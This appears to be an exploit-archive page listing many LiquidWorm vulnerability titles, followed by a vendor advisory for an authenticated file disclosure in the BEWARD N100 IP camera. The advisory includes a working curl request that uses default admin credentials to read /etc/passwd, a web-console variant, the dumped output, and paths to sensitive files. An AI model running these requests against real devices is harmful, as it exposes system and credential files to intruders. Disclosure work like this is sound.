2017-12-27 "Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure" webapps hardware LiquidWorm
2017-12-27 "Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-12-27 "Easy!Appointments 1.2.1 - Cross-Site Scripting" webapps php LiquidWorm
2017-12-27 "Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure" webapps php LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Privilege Escalation" webapps windows LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)" webapps windows LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Cross-Site Scripting" webapps windows LiquidWorm
2017-01-29 "TrueConf Server 4.3.7 - Multiple Vulnerabilities" webapps php LiquidWorm
2016-12-29 "Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps hardware LiquidWorm
2016-12-29 "Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection" webapps hardware LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Remote Command Execution" webapps hardware LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Authentication Bypass" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Local File Disclosure" webapps php LiquidWorm
2018-01-23 "NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download" webapps multiple LiquidWorm
2018-09-06 "NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)" webapps xml LiquidWorm
2016-08-31 "ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Directory Traversal" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution" webapps jsp LiquidWorm
2016-08-22 "Sakai 10.7 - Multiple Vulnerabilities" webapps java LiquidWorm
2016-08-10 "EyeLock nano NXT 3.5 - Remote Code Execution" webapps php LiquidWorm
2016-08-10 "EyeLock nano NXT 3.5 - Local File Disclosure" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)" webapps cgi LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Local File Disclosure" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Remote Code Execution" webapps php LiquidWorm
2016-07-26 "Iris ID IrisAccess ICU 7000-2 - Remote Command Execution" webapps cgi LiquidWorm
2016-07-26 "Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities" webapps cgi LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation" webapps multiple LiquidWorm
2016-07-08 "CyberPower Systems PowerPanel 3.1.2 - XML External Entity Out-Of-Band Data Retrieval" webapps xml LiquidWorm
2016-07-04 "XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery" webapps jsp LiquidWorm
2016-06-27 "Option CloudGate CG0192-11897 - Multiple Vulnerabilities" webapps hardware LiquidWorm
2016-06-15 "Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities" webapps hardware LiquidWorm
2016-05-31 "Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload" webapps php LiquidWorm
2016-04-25 "NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps ruby LiquidWorm
2016-06-16 "Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal" webapps windows LiquidWorm
2016-04-11 "Hikvision Digital Video Recorder - Cross-Site Request Forgery" webapps hardware LiquidWorm
2016-04-06 "Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities" webapps jsp LiquidWorm
2016-03-31 "MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2016-02-26 "Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities" webapps ashx LiquidWorm
2016-02-01 "Hippo CMS 10.1 - Multiple Vulnerabilities" webapps java LiquidWorm
2015-12-08 "dotCMS 3.2.4 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Local File Disclosure" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Expression Language Injection" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - XML External Entity Processing" webapps xml LiquidWorm
2015-11-12 "R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities" webapps php LiquidWorm
2015-11-02 "actiTIME 2015.2 - Multiple Vulnerabilities" webapps windows LiquidWorm
2015-10-19 "RealtyScript 4.0.2 - Multiple Blind SQL Injections" webapps php LiquidWorm
2015-10-19 "RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-10-11 "Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution" webapps php LiquidWorm
2015-10-08 "Kallithea 0.2.9 - 'came_from' HTTP Response Splitting" webapps multiple LiquidWorm
2015-09-28 "Centreon 2.6.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-09-28 "Mango Automation 2.6.0 - Multiple Vulnerabilities" webapps jsp LiquidWorm
2015-08-19 "up.time 7.5.0 - Upload and Execute" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Arbitrary File Disclose and Delete" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Superadmin Privilege Escalation" webapps php LiquidWorm
2015-08-07 "Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution" webapps php LiquidWorm
2015-08-07 "Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2012-08-23 "KindEditor - 'name' Cross-Site Scripting" webapps php LiquidWorm
2012-08-23 "Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities" webapps php LiquidWorm
2012-08-23 "SiNG cms - 'Password.php' Cross-Site Scripting" webapps php LiquidWorm
2015-07-13 "ArticleFR 3.0.6 - Multiple Vulnerabilities" webapps php LiquidWorm
2012-05-16 "backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting" webapps php LiquidWorm
2012-04-11 "BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Deletion" webapps php LiquidWorm
2015-04-08 "Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities" webapps php LiquidWorm
2015-04-08 "Balero CMS 0.7.2 - Multiple Blind SQL Injections" webapps php LiquidWorm
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting" webapps java LiquidWorm
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting" webapps java LiquidWorm
2015-03-17 "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-03-10 "GeniXCMS 0.0.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2011-10-26 "vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - 'thumb.php' Local File Inclusion" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - Multiple SQL Injections" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion" webapps php LiquidWorm
2011-06-07 "The Pacer Edition CMS 2.1 - 'email' Cross-Site Scripting" webapps php LiquidWorm
2011-05-31 "Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Cross-Site Scripting" webapps asp LiquidWorm
2015-01-13 "Gecko CMS 2.3 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-01-06 "AdaptCMS 3.0.3 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-12-15 "Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass" webapps windows LiquidWorm
2014-12-08 "IceHrm 7.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2011-04-03 "DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities" webapps php LiquidWorm
2011-02-15 "MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-11-22 "NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access" webapps hardware LiquidWorm
2014-11-19 "Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2014-10-27 "CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities" webapps hardware LiquidWorm
2014-10-14 "Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-10-14 "Croogo 2.0.0 - Arbitrary PHP Code Execution" webapps php LiquidWorm
2010-10-15 "eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-08-03 "RaidenTunes - 'music_out.php' Cross-Site Scripting" webapps php LiquidWorm
2014-07-30 "SkaDate Lite 2.0 - Remote Code Execution" webapps php LiquidWorm
2014-07-30 "SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-07-28 "Oxwall 1.7.0 - Multiple Cross-Site Request Forgery / HTML Injection Vulnerabilities" webapps php LiquidWorm
2014-07-17 "Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting" webapps php LiquidWorm
2014-06-25 "Lunar CMS 3.3 - Remote Command Execution" webapps php LiquidWorm
2014-06-21 "Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting" webapps php LiquidWorm
2014-06-10 "ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection" webapps php LiquidWorm
2014-04-29 "NULL NUKE CMS 2.2 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-03-25 "qEngine CMS 6.0.0 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - 'qvc_init()' Cookie Poisoning CAPTCHA Bypass" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - Database Backup Disclosure" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - 'task.php' Local File Inclusion" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - Remote Code Execution" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - Database Backup Disclosure" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - 'task.php' Local File Inclusion" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - Remote Code Execution" webapps php LiquidWorm
2014-03-03 "couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections" webapps php LiquidWorm
2014-02-20 "Stark CRM 1.0 - Multiple Vulnerabilities" webapps php LiquidWorm
2013-12-06 "BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting" webapps php LiquidWorm

Unfortunately we've not tracked down any possible victims.

Ads

BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure

Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in fileread script is not properly
verified before being used to read files. This can be exploited to disclose
the contents of arbitrary files via absolute path or via the SendCGICMD API.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php


26.01.2019


--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6

Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL

--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf